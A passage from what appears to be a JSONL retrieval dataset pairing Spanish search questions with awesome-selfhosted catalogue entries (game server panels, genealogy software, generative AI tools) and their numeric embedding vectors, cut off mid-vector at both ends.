-0.0021, 0.07705, 0.03218, -0.06385, 0.01172, 0.07387, 0.03292, 0.02192, 0.00028, 0.00131, 0.06322, -0.04665, 0.00117, -0.00637, -0.07245, 0.01649, -0.01595, -0.02043, 0.01672, -0.00439, -0.03612, 0.03002, -0.07862, -0.05879, -0.01808, 0.00403, -0.04875, 0.0063, -0.02823, 0.07118, -0.00647, 0.01117, 0.08697, -0.00634, 0.01406, -0.04575, -0.03734, -0.03671, 0.05833, 0.02725, -0.021, -0.05383, -0.00133, 0.04158, -0.03066, 0.01872, 0.02249, 0.02994, 0.00455, 0.02825, 0.05967, 0.04315, 0.05073, -0.05784, 0.04561, 0.01372, 0.00499, -0.05919, -0.00963, 0.01288, 0.02324, -0.02968, -0.00443, 0.04787, 0.0077, 0.00553, -0.02776, -0.02814, -0.00056, 0.01633, 0.00685, 0.02308, -0.05212, -0.03038, 0.05511, -0.03483, -0.07038, -0.03741, -0.00853, 0.01645, -0.01496, -0.03279, -0.05447, -0.09701, -0.01696, -0.05285, -0.06014, -0.06519, -0.03794, -0.04358, 0.04785, 0.05114, -0.06899, 0.0375]} -{"tipo": "pregunta", "herramienta": "Games - Administrative Utilities & Control Panels", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games - Administrative Utilities & Control Panels", "tema": "games - administrative utilities & control panels", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games - Administrative Utilities & Control Panels: Pelican Panel β€” Web application for easy management of game servers, offering a user-friendly interface for deploying, configuring, and managing servers, server monitoring tools, and extensive customization options (fork of Pterodactyl) [AGPL-3.0, PHP/Docker]. Pterodactyl β€” Management panel for game servers, with an intuitive UI for end users [MIT, PHP]. PufferPanel β€” Game server management panel designed for both small networks and game server providers [Apache-2.0, Go]. Retrom β€” Private cloud game library distribution server + frontend/launcher [GPL-3.0, Docker/Rust]. RomM β€” ROM manager for organizing, enriching, and playing retro games, with support for 400+ platforms [⚠, AGPL-3.0, Docker]. SourceBans++ β€” Admin, ban, and communication management system for games running on the Source engine [CC-BY-SA-4.0, PHP]. Sunshine β€” Remote game stream host for Moonlight with support up to 120 frames per second and 4K resolution [GPL-3.0, C++/deb/Docker].", "indexar": "cual es una alternativa libre a Pterodactyl para administrar mis servidores", "v": [-0.12431, -0.03087, -0.08632, -0.05864, 0.07399, 0.01635, 0.09287, -0.16632, -0.1468, 0.03566, -0.01935, -0.03464, 0.08107, -0.08053, 0.12215, -0.0676, 0.05908, -0.10221, 0.21938, 0.06566, 0.01281, 0.10208, -0.04411, -0.06859, -0.03825, 0.03692, 0.01885, -0.13009, -0.13952, 0.01919, 0.03107, -0.04481, 0.08998, -0.09442, 0.04463, 0.07069, 0.07205, 0.17974, 0.00232, 0.08526, -0.09093, 0.03187, 0.01951, 0.02965, -0.03311, -0.0314, -0.00876, -0.06318, 0.0861, 0.09249, -0.14483, -0.06135, -0.07319, 0.01582, 0.05829, 0.02976, 0.06141, -0.10781, 0.00382, 0.02208, -0.15252, 0.06364, 0.02728, 0.01114, -0.04005, -0.01045, -0.01628, -0.08383, -0.1107, 0.05011, 0.02552, 0.03151, 0.05284, -0.0703, -0.07848, 0.05572, -0.12968, -0.01469, 0.05917, 0.07204, -0.02487, -0.04488, -0.048, 0.08495, -0.10086, -0.17212, 0.10493, -0.10558, 0.04817, 0.05641, 0.07804, -0.01779, -0.03153, 0.10814, -0.05354, -0.00677, 0.04736, -0.04915, -0.00047, 0.07902, 0.11059, 0.06679, -0.12253, 0.01968, -0.08896, 0.0575, -0.01242, 0.00154, 0.04507, -0.02751, 0.05734, -0.03787, -0.05554, 0.04635, 0.0323, -0.08083, -0.04457, 0.02009, -0.0207, -0.05803, -0.0504, -0.01602, 0.04254, -0.02807, 0.07421, -0.00599, 0.11058, -0.01483, -0.02756, 0.01417, 0.03018, 0.00125, -0.08857, -0.05984, -0.09547, -0.02288, 0.09938, -0.02921, 0.01279, -0.00242, -0.0374, 0.03516, -0.02109, 0.0195, 0.09593, -0.02874, 0.08085, -0.04226, 0.01374, 0.00153, -0.04614, -0.02659, -0.00893, 0.07, -0.1145, 0.00768, -0.02405, -0.06518, -0.09713, 0.068, 0.02119, -0.02266, 0.0187, 0.06594, 0.00702, -0.06777, -0.00223, -0.00266, -0.03545, 0.00559, 0.02574, 0.01954, 0.04237, -0.0829, 0.03117, -0.07163, -0.10355, -0.10298, 0.09035, 0.02597, -0.00207, 0.03446, -0.12567, 0.0359, -0.08312, -0.02678, -0.02663, 0.04812, -0.03575, 0.00724, 0.05361, -0.01455, -0.03741, -0.06558, 0.01831, 0.02612, -0.02244, -0.11668, -0.03696, -0.00559, 0.0233, -0.04516, -0.06771, -0.02093, 0.00294, -0.0195, -0.05801, 0.07433, 0.00976, 0.05731, 0.03322, 0.00162, 0.08569, 0.02428, -0.02685, 0.02043, 0.01937, -0.04502, 0.01304, -0.05457, -0.00619, 0.03193, -0.00506, -0.01468, 0.00068, 0.03906, -0.02702, 0.06708, -0.01314, 0.0187, -0.0234, 0.01783, -0.02319, 0.01298, -0.00812, -0.0571, 0.04096, -0.00839, 0.0114, -0.03093, 0.05972, 0.07921, -0.04735, 0.00935, -0.03831, -0.08624, -0.0462, 0.01699, -0.08372, -0.02041, 0.01393, 0.00996, 0.00693, -0.01246, -0.00464, -0.02103]} -{"tipo": "pregunta", "herramienta": "Games - Administrative Utilities & Control Panels", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games - Administrative Utilities & Control Panels", "tema": "games - administrative utilities & control panels", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games - Administrative Utilities & Control Panels: Pelican Panel β€” Web application for easy management of game servers, offering a user-friendly interface for deploying, configuring, and managing servers, server monitoring tools, and extensive customization options (fork of Pterodactyl) [AGPL-3.0, PHP/Docker]. Pterodactyl β€” Management panel for game servers, with an intuitive UI for end users [MIT, PHP]. PufferPanel β€” Game server management panel designed for both small networks and game server providers [Apache-2.0, Go]. Retrom β€” Private cloud game library distribution server + frontend/launcher [GPL-3.0, Docker/Rust]. RomM β€” ROM manager for organizing, enriching, and playing retro games, with support for 400+ platforms [⚠, AGPL-3.0, Docker]. SourceBans++ β€” Admin, ban, and communication management system for games running on the Source engine [CC-BY-SA-4.0, PHP]. Sunshine β€” Remote game stream host for Moonlight with support up to 120 frames per second and 4K resolution [GPL-3.0, C++/deb/Docker].", "indexar": "con que puedo montar un servidor de juegos retro y organizar miles de plataformas", "v": [0.04882, 0.09927, -0.17231, -0.20355, -0.17893, -0.04139, -0.00923, 0.01923, -0.052, -0.13727, -0.0945, -0.03158, 0.11633, -0.01858, 0.1293, 0.04702, 0.15496, -0.03692, 0.04102, 0.03978, -0.08542, 0.02657, 0.00839, -0.06112, 0.02408, 0.04601, 0.12259, -0.05718, -0.17053, -0.03936, -0.04989, 0.00529, 0.09144, -0.06589, -0.02604, -0.20959, 0.05734, 0.11295, -0.0757, -0.03286, -0.05752, 0.0156, -0.04197, 0.01494, 0.06232, 0.007, 0.06163, -0.07717, 0.0033, -0.02659, 0.01004, -0.06515, -0.13385, -0.02054, -0.01936, -0.07849, 0.02185, -0.10344, 0.05156, -0.03473, -0.14437, 0.02687, 0.00909, -0.00393, 0.07684, 0.09274, -0.08209, 0.03329, -0.09919, 0.03135, -0.0636, 0.00325, -0.00894, -0.01096, 0.01615, 0.09342, 0.0214, -0.02974, 0.01041, 0.09624, 0.01585, -0.00216, -0.10331, 0.17622, -0.0716, -0.05999, -0.04576, -0.06613, 0.08814, 0.01404, 0.01932, 0.03757, -0.046, 0.04133, -0.01499, -0.14792, 0.14223, 0.11146, 0.03698, 0.01778, -0.09311, 0.01614, 0.00241, 0.08361, -0.06154, 0.06303, 0.10492, -0.03618, 0.09235, -0.04195, 0.04028, 0.03318, -0.02547, 0.05884, -0.03652, -0.10014, -0.0248, 0.07439, 0.09756, 0.0508, -0.07395, 0.04374, 0.11198, 0.04419, 0.04215, -0.06785, 0.05658, 0.06504, -0.03324, -0.04442, 0.02487, -0.05813, -0.07621, 0.01128, -0.04458, 0.02275, 0.06635, 0.02337, -0.0197, -0.02246, 0.05066, 0.06755, -0.01493, -0.04627, 0.11357, 0.05247, 0.09957, -0.10139, -0.06207, -0.00402, 0.04543, 0.07168, -0.04557, -0.00661, -0.09957, -0.0053, 0.04425, -0.03821, -0.03002, 0.04574, -0.02842, 0.03602, -0.00733, 0.0394, 0.03031, -0.02878, 0.02992, 0.05087, -0.00336, 0.00105, -0.09221, 0.05494, 0.03702, -0.11306, 0.0041, 0.03041, -0.06, -0.0239, 0.03084, 0.01923, 0.01355, -0.02801, -0.01787, 0.01366, -0.07183, -0.061, 0.04466, -0.01799, 0.03677, -0.00183, -0.00236, 0.01725, -0.07669, 0.04462, 0.08875, -0.05503, -0.0232, 0.00458, -0.0078, -0.00528, -0.02626, -0.05266, -0.02552, -0.02598, -0.03816, -0.03367, -0.0471, 0.0471, 0.00814, 0.0299, -0.00229, -0.0065, 0.04421, -0.02548, -0.03521, -0.03797, 0.06071, -0.04799, -0.02009, -0.01509, -0.05472, -0.00488, -0.00244, -0.05076, -0.03169, -0.00852, 0.05891, 0.02575, 0.0827, -0.01967, -0.02018, 0.00826, -0.02498, 0.02891, -0.0124, -0.02824, 0.07573, -0.04404, -0.04149, -0.00252, 0.0144, 0.0266, 0.01036, -0.05039, -0.02641, -0.0993, -0.01637, -0.02845, -0.04138, -0.02939, -0.02896, -0.05101, 0.04094, -0.03911, -0.06355, 0.01557]} -{"tipo": "pregunta", "herramienta": "Genealogy", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Genealogy", "tema": "genealogy", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Genealogy: Genea.app β€” Genealogy tool designed with privacy in mind that anyone can use to author or edit their family tree. Data is stored in the GEDCOM format and all processing is done in the browser [MIT, Javascript]. Genealogy β€” Record family members and their relationships and build a family tree [MIT, PHP]. GeneWeb β€” Genealogy software that can be used offline or as a Web service [GPL-2.0, OCaml]. Gramps Web β€” Web app for collaborative genealogy, based on and interoperable with Gramps, the open source genealogy desktop application [AGPL-3.0, Docker]. webtrees β€” Webtrees is the web's leading online collaborative genealogy application [GPL-3.0, PHP].", "indexar": "que programa puedo usar para crear un Γ‘rbol genealΓ³gico en casa", "v": [-0.13232, -0.04653, -0.06779, -0.12018, -0.07658, 0.0488, -0.04295, 0.00892, -0.08643, -0.14333, -0.15367, -0.09548, -0.1324, -0.02226, 0.00287, -0.01976, 0.10285, -0.01521, -0.01104, 0.06197, -0.08511, 0.07558, -0.06951, -0.07941, -0.03114, -0.10916, 0.10999, -0.03235, 0.00157, 0.17375, -0.04004, 0.03595, 0.11034, -0.14144, -0.12319, 0.02891, 0.01863, 0.03904, 0.01502, 0.03842, -0.03026, -0.0111, -0.05245, 0.08899, -0.09908, 0.05301, 0.06723, -0.05648, -0.12217, 0.00325, -0.11258, -0.005, -0.05965, -0.09346, 0.07142, -0.0521, -0.00692, -0.19294, -0.00403, 0.04434, -0.09258, 0.03049, 0.01277, -0.0981, -0.08608, -0.07794, 0.05452, 0.03671, -0.03152, -0.06967, 0.02514, -0.05281, 0.05208, -0.08302, 0.04836, 0.05176, 0.00993, -0.16812, 0.02061, -0.00894, -0.05318, -0.03101, -0.04373, -0.0121, -0.02771, 0.00399, 0.08389, -0.05465, 0.0529, -0.17675, -0.08247, 0.00609, 0.06793, 0.09589, 0.04518, -0.02955, 0.03372, 0.03302, -0.01325, 0.02791, -0.00676, -0.04189, 0.02589, 0.19744, -0.00604, 0.04704, 0.02156, 0.03291, -0.08993, 0.0618, -0.0322, 0.04877, -0.00035, 0.00893, -0.07224, 0.03457, 0.03005, -0.06488, 0.01487, -0.01039, -0.01544, 0.08032, -0.01881, 0.06552, -0.04252, -0.01395, 0.04803, 0.13724, -0.07057, 0.07522, -0.05823, -0.03297, -0.06179, -0.11169, -0.1137, 0.00534, -0.0368, -0.07623, -0.02501, 0.0467, 0.02345, 0.10641, -0.06378, -0.02956, 0.01497, -0.01103, -0.08943, -0.03467, -0.03562, -0.0015, 0.00578, 0.04622, 0.03479, 0.01702, -0.05022, -0.04732, -0.02469, -0.00323, 0.04672, 0.02749, -0.10603, 0.00532, -0.0501, -0.03029, 0.03927, 0.01106, 0.07449, 0.06371, 0.06889, 0.0341, -0.05962, 0.03966, 0.01548, -0.01743, 0.00754, -0.0027, -0.01352, -0.01219, -0.01341, 0.03126, -0.08854, -0.01896, -0.00483, -0.07491, -0.04168, 0.03258, 0.03338, 0.05088, -0.01931, -0.00789, -0.09517, 0.12168, -0.01435, 0.06924, 0.00359, 0.01256, 0.02643, 0.00219, 0.08608, -0.05223, -0.01366, 0.0073, 0.054, 0.00408, 0.11533, 0.03203, 0.02228, -0.0613, -0.00561, 0.1329, -0.0002, -0.08527, 0.11502, 0.09422, -0.06704, -0.02878, -0.07752, 0.00913, 0.07023, 0.03092, 0.06584, 0.05024, 0.02912, 0.0626, -0.00322, -0.00312, 0.00227, -0.01908, 0.03277, 0.03643, -0.03423, -0.06696, 0.06252, 0.01963, 0.02021, -0.04737, 0.00236, 0.00901, -0.01273, -0.00294, -0.04215, 0.02546, 0.01535, 0.03298, -0.03792, -0.02551, -0.06517, 0.02184, 0.0169, -0.01847, -0.00768, -0.01272, 0.00423, -0.07902, 0.01755, 0.06156]} -{"tipo": "pregunta", "herramienta": "Genealogy", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Genealogy", "tema": "genealogy", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Genealogy: Genea.app β€” Genealogy tool designed with privacy in mind that anyone can use to author or edit their family tree. Data is stored in the GEDCOM format and all processing is done in the browser [MIT, Javascript]. Genealogy β€” Record family members and their relationships and build a family tree [MIT, PHP]. GeneWeb β€” Genealogy software that can be used offline or as a Web service [GPL-2.0, OCaml]. Gramps Web β€” Web app for collaborative genealogy, based on and interoperable with Gramps, the open source genealogy desktop application [AGPL-3.0, Docker]. webtrees β€” Webtrees is the web's leading online collaborative genealogy application [GPL-3.0, PHP].", "indexar": "cual es una alternativa libre a Genealogica para gestionar mis datos familiares", "v": [-0.24855, 0.01432, 0.02669, -0.10771, -0.03912, 0.00034, -0.07741, -0.06209, -0.21823, -0.05911, 0.01542, -0.17108, -0.11085, 0.05673, 0.13836, 0.01248, 0.06848, -0.02676, 0.06753, -0.0508, -0.15445, 0.09095, 0.10312, -0.14047, -0.0867, -0.11959, 0.07322, -0.09409, -0.02232, 0.14875, 0.05043, -0.12578, -0.01735, -0.13125, -0.01612, 0.19113, 2e-05, 0.08278, 0.07341, -0.10089, 0.00506, -0.10202, -0.12058, 0.04773, -0.00156, -0.01067, -0.0693, 0.05281, -0.0461, 0.01566, -0.12217, 0.02258, -0.0027, 0.00538, 0.06216, 0.00119, 0.0963, -0.12732, -0.02736, 0.03917, -0.11039, 0.03676, 0.04064, 0.03387, -0.06714, 0.02827, 0.04539, -6e-05, -0.09935, 0.03682, 0.03922, 0.08876, 0.018, -0.01011, -0.05985, -0.09698, 0.09629, 0.06972, 0.02788, 0.0155, -0.06199, -0.00458, -0.03158, 0.06428, -0.01926, -0.03174, 0.08069, -0.00389, 0.02405, -0.03684, 0.07226, -0.05453, -0.0016, 0.01907, 0.00995, 0.05857, 0.04876, 0.01174, -0.00655, 0.05673, -0.01573, 0.06801, -0.1147, 0.05979, 0.02952, 0.02795, 0.02469, 0.02605, -0.08564, -0.01699, -0.0582, 0.0447, 0.03474, 0.02396, 0.00826, 0.00786, 0.07674, -0.00664, -0.01749, 0.03818, -0.00503, -0.07537, 0.10143, -0.03418, -0.00135, 0.05502, 0.02373, 0.02843, 0.01226, 0.12054, -0.03572, -0.03864, -0.07242, -0.08553, -0.04864, 0.00301, -0.0442, -0.05849, 0.08491, -0.06236, -0.04921, 0.02588, -0.04451, -0.0121, 0.09505, -0.06328, -0.02897, 0.04258, 0.04698, -0.05011, -0.08793, 0.03149, 0.04921, 0.09151, -0.10511, 0.04651, -0.07898, -0.04462, -0.06968, 0.01691, 0.03179, -0.0148, -0.0463, 0.06762, -0.01561, -0.01851, 0.01654, -0.00851, -0.05053, 0.00959, -0.06888, 0.05601, 0.0508, -0.07697, 0.08995, -0.07065, -0.02654, -0.11869, 0.0214, -0.03967, -0.00426, -0.03847, -0.0407, -0.00156, -0.04629, -0.01079, 0.01034, 0.05127, -0.00699, 0.0137, -0.02476, 0.08516, -0.00759, -0.07033, 0.00715, 0.00885, -0.02638, -0.03514, 0.02742, 0.03298, -0.01211, 0.01714, 0.03711, -0.02926, -0.02732, 0.09457, 0.02072, -0.01747, 0.04746, 0.00056, -0.00937, 0.01605, 0.08719, 0.04185, -0.09839, -0.02647, 0.0276, -0.06279, 0.06741, -0.03293, 0.0046, 0.08019, 0.04835, -0.02929, -0.07492, -0.00127, 0.05482, 0.01178, -0.01317, -0.06585, 0.03787, 0.0268, 0.06625, 0.05954, 0.02751, -0.01334, -0.02785, -0.02163, 0.02711, -0.00445, 0.05911, 0.02608, 0.02272, -0.00573, -0.02894, -0.04204, -0.08543, 0.05089, 0.01219, -0.05244, -0.01671, -0.01634, 0.01961, -0.02169, 0.00257, -0.02326]} -{"tipo": "pregunta", "herramienta": "Genealogy", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Genealogy", "tema": "genealogy", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Genealogy: Genea.app β€” Genealogy tool designed with privacy in mind that anyone can use to author or edit their family tree. Data is stored in the GEDCOM format and all processing is done in the browser [MIT, Javascript]. Genealogy β€” Record family members and their relationships and build a family tree [MIT, PHP]. GeneWeb β€” Genealogy software that can be used offline or as a Web service [GPL-2.0, OCaml]. Gramps Web β€” Web app for collaborative genealogy, based on and interoperable with Gramps, the open source genealogy desktop application [AGPL-3.0, Docker]. webtrees β€” Webtrees is the web's leading online collaborative genealogy application [GPL-3.0, PHP].", "indexar": "con que herramienta puedo colaborar con otros amigos en el registro de mi familia", "v": [0.01607, 0.17184, -0.14926, -0.16283, 0.00106, -0.09964, -0.07943, 0.02995, -0.06936, -0.19347, -0.03352, -0.05201, 0.08255, -0.08243, 0.11622, 0.04294, 0.1013, 0.03799, 0.00106, -0.01077, 0.02296, 0.04636, -0.05311, 0.05805, 0.00134, -0.14217, 0.08727, 0.02376, -0.12326, 0.15916, 0.06391, 0.01896, 0.00507, -0.0482, -0.04449, 0.00753, 0.04714, 0.0637, 0.00733, -0.09123, -0.09066, 0.00699, -0.0406, 0.0063, -0.01267, 0.05584, -0.12659, -0.00127, -0.03544, 0.08434, -0.02572, -0.23951, -0.04972, -0.06954, -0.11182, -0.04807, 0.17409, -0.12651, -0.00041, -0.01244, -0.14405, -0.03533, -0.09832, 0.03058, -0.02793, -0.0339, 0.01652, -0.06802, -0.09106, 0.06102, 0.04196, 0.09048, -0.00677, -0.13824, -0.07179, 0.01105, 0.1002, -0.04122, 0.03251, 0.01926, 0.02393, -0.01976, 0.07355, 0.01735, 0.06585, -0.07585, 0.01054, -0.03782, 0.10639, -0.06992, 0.05843, 0.03849, 0.02403, 0.00971, 0.07098, 0.0609, 0.12596, -0.01641, -0.0305, 0.06114, 0.12914, -0.05225, -0.08482, 0.02476, -0.01617, -0.06376, -0.02285, -0.0518, -0.02739, 0.01756, 0.04603, 0.06219, 0.02456, 0.00874, -0.03314, 0.06034, -0.02625, -0.02736, -0.00324, -0.0718, 0.00274, 0.02404, 0.00294, -0.06887, 0.01884, 0.00485, -0.05762, 0.10217, -0.0039, -0.00044, -0.07401, 0.01044, -0.06888, -0.0332, 0.04043, 0.01375, -0.09103, -0.06104, 0.02439, -0.10474, 0.09875, -0.01088, -0.00935, -0.18543, 0.03086, 0.00728, -0.05257, -0.02488, -0.05705, -0.02509, 0.02311, -0.00152, 0.00984, 0.06093, -0.04023, 0.07627, 0.01001, 0.0707, -0.0118, -0.04689, -0.00455, -0.03217, 0.04815, -0.04862, -0.03948, 0.02242, 0.02168, -0.02732, 0.02335, -0.04224, -0.04776, -0.00619, 0.04333, -0.02779, 0.033, -0.10241, -0.04168, -0.0299, 0.00307, -0.04062, -0.11173, 0.0496, -0.03671, -0.01784, 0.01103, -0.0498, 0.01087, 0.03817, 0.05098, -0.02403, -0.00303, 0.02402, 0.02368, -0.01774, -0.00375, -0.00813, -0.03069, -0.03681, 0.10538, -0.03136, -0.01747, -0.04755, 0.02004, -0.07713, -0.00285, 0.08599, -0.05496, 0.02245, 0.04803, 0.02693, 0.05413, -0.00676, 0.02733, 0.03552, -0.05247, 0.06149, -0.0402, 0.0005, 0.04745, 0.07415, 0.02632, 0.06884, 0.0437, -0.02027, 0.0266, -0.00744, 0.02529, -0.04549, 0.02054, -0.04797, -0.0009, -0.00266, -0.01682, -0.03926, 0.03955, -0.01551, 0.01735, -0.04724, -0.01752, 0.0001, 0.02523, 0.01845, 0.04646, -0.0283, -0.08805, -0.05794, -0.01464, 0.04785, 0.0334, -0.1285, -0.02073, 0.03453, 0.10359, -0.1289, 0.02833, -0.01059]} -{"tipo": "pregunta", "herramienta": "Generative Artificial Intelligence (GenAI)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Generative Artificial Intelligence (GenAI)", "tema": "generative artificial intelligence (genai)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Generative Artificial Intelligence (GenAI): Agenta β€” LLMOps platform for prompt management, LLM evaluation, and observability. Build, evaluate, and monitor production-grade LLM applications with collaborative prompt engineering [MIT, Docker]. AnythingLLM β€” All-in-one desktop & Docker AI application with built-in RAG, AI agents, No-code agent builder, MCP compatibility, and more [MIT, Nodejs/Docker]. GoModel β€” AI gateway written in Go with a unified OpenAI-compatible API for multiple LLM providers, USD cost tracking, budgets, usage analytics, guardrails, caching, and an admin dashboard [MIT, Go/Docker]. Khoj β€” Your AI second brain. Get answers from the web or your docs. Build custom agents, schedule automations, do deep research. Turn any online or local LLM into your personal, autonomous AI [AGPL-3.0, Python/Docker]. LibreChat β€” Enhanced ChatGPT-compatible AI chat interface supporting multiple AI providers, with multi-user auth, message search, and plugin support [⚠, MIT, Nodejs/Docker].", "indexar": "ΒΏQuΓ© herramienta me sirve para gestionar y evaluar prompts en aplicaciones de IA?", "v": [-0.04332, 0.24027, -0.1243, -0.27512, 0.14203, -0.07946, -0.06369, -0.06784, -0.04652, -0.10047, -0.0392, -0.00279, 0.01825, -0.05357, 0.01918, 0.07946, 0.07867, -0.15478, -0.04098, 0.0662, 0.0034, 0.04868, -0.13732, -0.01719, -0.17936, 0.05841, 0.06361, -0.03009, -0.06076, -0.03982, -0.09536, -0.01121, 0.08414, -0.12633, -0.11898, -0.06838, -0.06531, -0.00514, -0.02465, 0.09459, -0.00627, 0.077, -0.03738, 0.0419, 0.08608, 0.00507, 0.01492, 0.01131, -0.06465, 0.02939, -0.1059, -0.16688, 0.00091, 0.06658, 0.01016, -0.03169, 0.09389, -0.14811, 0.04346, -0.10301, -0.13121, 0.01747, -0.08722, 0.0287, 0.02827, -0.0714, 0.05047, -0.03735, -0.08289, 0.06922, -0.05428, 0.02932, 0.03118, 0.03552, 0.03048, 0.03827, 0.01151, 0.04802, 0.08148, 0.02217, 0.01351, -0.01445, -0.06385, -0.00544, -0.05217, -0.08879, 0.03502, 0.00844, 0.05053, 0.00972, -0.04945, -0.00788, 0.00657, -0.02152, -0.0088, -0.03534, 0.04324, 0.00352, 0.06894, 0.07275, 0.07961, -0.17215, -0.04852, 0.05417, -0.122, 0.05706, -0.0009, -0.09346, -0.05978, -0.03927, 0.04703, -0.08569, -0.00331, 0.0488, -0.03746, 0.0977, 0.01602, -0.13336, -0.02958, -0.0166, -0.0388, 0.03559, -0.02229, -0.03242, 0.08676, -0.02042, 0.0101, 0.11684, 0.04207, 0.07468, -0.00642, -0.04672, -0.05527, -0.01692, -0.02027, -0.00983, 0.04173, -0.09336, -0.01826, -0.07771, -0.02508, 0.08399, 0.0213, -0.03048, 0.08212, 0.03035, 0.01083, -0.04499, 0.02878, 0.02462, 0.03975, -0.09899, -0.03957, 0.01196, -0.04409, -0.06707, 0.00142, -0.00059, -0.09516, 0.03345, -0.0571, -0.06529, -0.00026, 0.00142, -0.00753, -0.03846, 0.05876, 0.02227, 0.12227, 0.10464, 0.02904, 0.02433, 0.0327, -0.03845, 0.04405, -0.07826, 0.00962, -0.01367, 0.01135, -0.06502, -0.03156, 0.00183, 0.03572, 0.03205, 0.00793, -0.03744, 0.00847, 0.03725, 0.01667, 0.07367, -0.003, 0.07343, 0.02943, -0.07836, 0.07891, 0.00081, -0.00037, -0.063, -0.02329, 0.01128, -0.04329, -0.03123, -0.00928, -0.00139, 0.05068, 0.07015, -0.0264, 0.07416, -0.00798, 0.02267, 0.01164, 0.0605, 0.07479, 0.01312, -0.07097, -0.08144, 0.01735, 0.07889, -0.03738, 0.01007, -0.00041, 0.00159, 0.02788, -0.04235, 2e-05, 0.04945, 0.02603, -0.01559, 0.03204, 0.02303, 0.0268, -0.01323, -0.02103, -0.01387, 0.00384, -0.0519, 0.05587, -0.06696, -0.05471, -0.02026, 0.00264, 0.05617, 0.03228, -0.034, -0.072, -0.03585, -0.04025, 0.02043, -0.04091, -0.03952, -0.04394, -0.00367, 0.07634, 0.00988, 0.05864, -0.03647]} -{"tipo": "pregunta", "herramienta": "Generative Artificial Intelligence (GenAI)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Generative Artificial Intelligence (GenAI)", "tema": "generative artificial intelligence (genai)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Generative Artificial Intelligence (GenAI): Agenta β€” LLMOps platform for prompt management, LLM evaluation, and observability. Build, evaluate, and monitor production-grade LLM applications with collaborative prompt engineering [MIT, Docker]. AnythingLLM β€” All-in-one desktop & Docker AI application with built-in RAG, AI agents, No-code agent builder, MCP compatibility, and more [MIT, Nodejs/Docker]. GoModel β€” AI gateway written in Go with a unified OpenAI-compatible API for multiple LLM providers, USD cost tracking, budgets, usage analytics, guardrails, caching, and an admin dashboard [MIT, Go/Docker]. Khoj β€” Your AI second brain. Get answers from the web or your docs. Build custom agents, schedule automations, do deep research. Turn any online or local LLM into your personal, autonomous AI [AGPL-3.0, Python/Docker]. LibreChat β€” Enhanced ChatGPT-compatible AI chat interface supporting multiple AI providers, with multi-user auth, message search, and plugin support [⚠, MIT, Nodejs/Docker].", "indexar": "Con quΓ© puedo montar una plataforma completa de agentes de IA con gestiΓ³n de conocimientos (RAG)?", "v": [-0.07259, 0.12105, -0.14487, -0.18389, 0.05032, -0.00709, 0.06281, 0.01802, -0.31485, -0.01164, -0.05856, -0.03262, 0.05052, 0.02746, 0.17926, 0.21391, 0.05231, -0.0176, -0.10406, 0.05099, -0.05373, -0.08733, 0.00368, -0.01597, -0.03325, 0.00528, 0.07876, -0.07999, 0.02719, -0.02631, 0.00224, 0.00993, -0.02288, -0.04596, -0.05745, -0.07064, -0.03373, 0.13221, 0.03497, -0.07901, -0.09821, -0.058, 0.00613, 0.00897, 0.14212, 0.03918, -0.01442, -0.11165, 0.02426, -0.01494, -0.08987, -0.05234, -0.09164, -0.05209, -0.04054, -0.13313, 0.10187, -0.00535, 0.07432, 0.00053, 0.02028, 0.13187, -0.06173, 0.05895, 0.05694, 0.0547, 0.04419, -0.00372, -0.0311, 0.04326, -0.02431, -0.06328, -0.02398, -0.01012, -0.00283, 0.02283, 0.01681, 0.0303, 0.01777, -0.00564, 0.07025, 0.042, -0.12101, 0.04034, -0.01733, -0.07737, -0.04109, -0.15258, 0.06552, -0.03878, -0.02963, -0.01373, -0.02867, -0.07173, 0.00854, -0.09282, 0.08673, -0.0265, -0.05242, -0.01546, -0.04898, 0.0236, -0.05374, 0.15746, -0.01244, 0.02008, 0.02981, -0.09733, 0.03422, -0.0453, 0.04748, 0.03912, -0.09108, 0.01018, -0.0662, 0.03324, -0.03296, 0.03108, -0.0307, 0.04406, -0.06275, 0.01083, 0.05052, 0.00963, 0.23738, 0.02593, 0.00739, 0.15118, -0.00658, -0.00348, -0.00571, -0.08423, -0.09074, -0.03765, 0.07315, 0.02121, 0.02832, 0.00535, 0.0152, -0.05301, -0.06952, -0.0024, 0.06398, -0.07582, 0.08223, -0.0134, 0.01875, -0.11514, 0.01944, 0.01142, -0.01477, 0.05265, -0.00995, 0.03875, -0.11322, -0.04286, 0.07654, -0.02237, -0.05265, 0.05218, 0.01319, 0.03561, -0.04775, 0.05874, -0.01251, 0.02481, -0.00645, 0.05914, -0.01259, 0.01369, -0.01837, 0.04039, 0.05946, -0.10956, 0.01752, -0.01873, -0.06729, -0.03667, 0.0506, -0.07204, -0.02484, -0.05908, -0.0274, 0.06655, -0.00322, -0.04312, 0.00553, -0.04994, -0.00319, 0.06702, 0.01581, 0.03429, 0.0055, -0.0097, 0.06052, -0.01798, -0.04904, 0.03685, 0.07436, -0.04678, -0.02698, -0.02366, 0.04169, 0.00426, -0.01509, -0.00901, -0.00051, 0.05437, 0.05534, 0.03584, -0.02065, -0.02886, 0.06081, -0.0928, -0.00653, 0.01111, 0.04958, -0.00652, -0.03733, 0.02062, 0.01586, 0.06905, -0.02239, 0.02127, -0.00167, 0.00352, 0.00761, 0.00027, 0.0856, 0.01941, 0.03354, -0.02231, 0.00458, -0.05128, 0.01704, -0.03285, 0.03352, -0.01301, -0.10031, -0.01744, 